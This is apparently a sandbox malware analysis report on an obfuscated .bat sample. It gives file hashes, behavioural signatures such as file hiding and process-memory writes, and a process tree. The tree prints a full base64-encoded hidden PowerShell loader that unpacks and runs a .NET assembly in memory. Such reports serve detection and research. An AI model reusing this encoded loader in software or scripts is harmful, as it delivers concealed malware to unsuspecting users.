Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
09-11-2024 19:11
Static task
static1
Behavioral task
behavioral1
Sample
New folder/08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
New folder/08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
New folder/8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
New folder/8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
New folder/fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat
Resource
win7-20241023-en
Behavioral task
behavioral6
Sample
New folder/fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat
Resource
win10v2004-20241007-en
General
-
Target
New folder/8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat
-
Size
2.1MB
-
MD5
a5a4c0545136eb52dd37437623238dd6
-
SHA1
3b8864445bac90d1ce0e4ff9b9bb8641728371d1
-
SHA256
8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df
-
SHA512
69b7d50551e7352d131390e1d70b74568e7ad4b7e66eebb8217aa22bd694249495f8933aa9fe14514d2f2ba039fee95e0090407369c84fd09003cd8f075a05a8
-
SSDEEP
49152:HV/aYoonKuRO7Ci2BBVvI/W1yLNh+lMcs:y
Malware Config
Signatures
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Executes dropped EXE 1 IoCs
Processes:
8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exepid process 2836 8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe -
Loads dropped DLL 1 IoCs
Processes:
cmd.exepid process 2724 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exepid process 2836 8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exedescription pid process Token: SeDebugPrivilege 2836 8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
cmd.exedescription pid process target process PID 2724 wrote to memory of 2780 2724 cmd.exe attrib.exe PID 2724 wrote to memory of 2780 2724 cmd.exe attrib.exe PID 2724 wrote to memory of 2780 2724 cmd.exe attrib.exe PID 2724 wrote to memory of 2836 2724 cmd.exe 8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe PID 2724 wrote to memory of 2836 2724 cmd.exe 8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe PID 2724 wrote to memory of 2836 2724 cmd.exe 8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe PID 2724 wrote to memory of 3068 2724 cmd.exe attrib.exe PID 2724 wrote to memory of 3068 2724 cmd.exe attrib.exe PID 2724 wrote to memory of 3068 2724 cmd.exe attrib.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 2780 attrib.exe 3068 attrib.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\system32\attrib.exeattrib +s +h "C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat".exe2⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2780
-
-
C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe"C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat".exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgABmVKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwAZlScAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAbQBlAHQAaABvAGQASQBuAGYAbwAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgACQAaQBuAHMAdABhAG4AYwBlACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJABtAGUAdABoAG8AZABJAG4AZgBvAC4ATgBhAG0AZQApADsAIAAkAG0AZQB0AGgAbwBkAEkAbgBmAG8ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
-
C:\Windows\system32\attrib.exeattrib -s -h "C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat".exe2⤵
- Views/modifies file attributes
PID:3068
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe
Filesize462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d